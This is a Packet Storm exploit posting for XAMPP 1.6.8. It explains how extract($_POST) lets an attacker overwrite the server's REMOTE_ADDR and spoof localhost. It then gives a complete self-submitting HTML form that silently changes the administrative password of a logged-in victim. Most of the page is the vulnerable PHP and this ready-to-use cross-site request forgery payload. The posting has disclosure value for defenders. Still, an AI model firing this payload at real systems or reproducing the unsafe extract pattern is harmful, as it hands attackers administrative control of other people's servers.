what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

XAMPP 1.6.8 Password Exploit

XAMPP 1.6.8 Password Exploit
Posted Dec 8, 2008
Authored by Michael Brooks | Site rooksecurity.com

XAMPP version 1.6.8 cross site request forgery exploit that changes the administrative password.

tags | exploit, csrf
SHA-256 | ec3a73d7d95b2c2beed4df05ae39dcd55297c2a015022002311391168d66da31

XAMPP 1.6.8 Password Exploit

Change Mirror Download
XAMPP change administrative password:
--------------------------------------------------------------------------------
Written by Michael Brooks
special thanks to str0ke

Affects XAMPP 1.6.8.
homepage: http://www.apachefriends.org/
XAMPP has 17+ million downloads from sourceforge.net.
register_globals=On or Off
This attack is exploitable even when this page is reporting a fully
secure system: http://10.1.1.10/security/index.php

There are two vulnerabilities that are being used toagther.
1)Global variable manipulation to spoof ip address.
2)XSRF to change the .htaccess password for http://10.1.1.10/security/
and http://10.1.1.10/xampp/ .

The $_SERVER[REMOTE_ADDR] comes directly from Apache's tcp socket and
this cannot normally be spoofed.
However extract($_POST); can be used to overwrite any declared
variable, including the $_SERVER superglobal. This can be used to
"spoof" your ip address as 127.0.0.1
This xsrf attack can be exploited from a browser in any ip address, so
long as that browser is currently authenticated.

This vulnerable code is from the very top of: /security/xamppsecurity.php
<?php
error_reporting(0);
extract($_POST);
extract($_SERVER);
$host = "127.0.0.1";
$timeout = "1";

if ($REMOTE_ADDR) {
if ($REMOTE_ADDR != $host) {
echo "<h2> FORBIDDEN FOR CLIENT $REMOTE_ADDR <h2>";
exit;
}
}
//...

//Start of xsrf attack
<html>
<form action='http://10.1.1.10/security/xamppsecurity.php' method='POST' id=1>
<input type="hidden" name="_SERVER[REMOTE_ADDR]" value="127.0.0.1">
<input type=hidden name="xamppuser" value=admin >
<input type=hidden name="xampppasswd" value=password>
<input type=hidden name="xamppaccess" value="Make+safe+the+XAMPP+directory">
<input type=submit>
</form>
</html>
<script>
document.getElementById(1).submit();
</script>
//End of xsrf attack

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close